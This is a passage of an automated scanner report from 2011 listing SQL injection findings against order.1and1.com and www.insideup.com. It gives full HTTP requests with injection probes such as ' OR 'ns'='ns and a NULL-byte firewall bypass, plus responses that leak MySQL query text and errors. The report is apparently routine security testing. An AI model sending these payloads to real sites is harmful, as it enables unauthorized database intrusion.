
Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 00:25:33 GMT
Server: Apache
Expires: Sat, 26 Mar 2011 00:35:33 GMT
Cache-Control: max-age=600
Cache-Control: private
Content-Type: text/javascript;charset=utf-8
Content-Length: 85939

UNOUNO.namespace("global");UNOUNO.global.Functions={getElementsByClassName:function(clsName,element){var retVal=[];var elements;if(element){elements=element.getElementsByTagName("*");}else{elements=do
...[SNIP]...
1.4. http://order.1and1.com/xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://order.1and1.com
Path:   /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 26 Mar 2011 00:24:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 388
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=

Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 00:24:37 GMT
Server: Apache
Expires: Sat, 26 Mar 2011 00:34:37 GMT
Cache-Control: max-age=600
Cache-Control: private
Content-Type: text/javascript;charset=utf-8
Content-Length: 302658

if(typeof UNOUNO=="undefined"){var UNOUNO={};}if(typeof UNOUNO.namespace=="undefined"){UNOUNO.namespace=function(){var a=arguments,o=null,i,j,d;for(i=0;i<a.length;++i){d=a[i].split(".");o=UNOUNO;for(j
...[SNIP]...
1.5. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow'/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow'/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow'/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow'/hins00/leadfl' at line 5

Request 2

GET /ppc/leadflow''/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
1.6. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00'/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00'/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00'/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00'/leadfl' at line 5

Request 2

GET /ppc/leadflow/hins00''/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
1.7. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow'/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow'/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow'/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow''/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
1.8. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00'/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00'/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00'/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00''/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
1.9. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php'?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php'?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php'?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php''?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
1.10. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns'&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns'&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns''&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.0 404 Not Found
Date: Fri, 25 Mar 2011 19:16:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00/leadflow/hins00/project.php was not found on this server.</p>
1.11. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
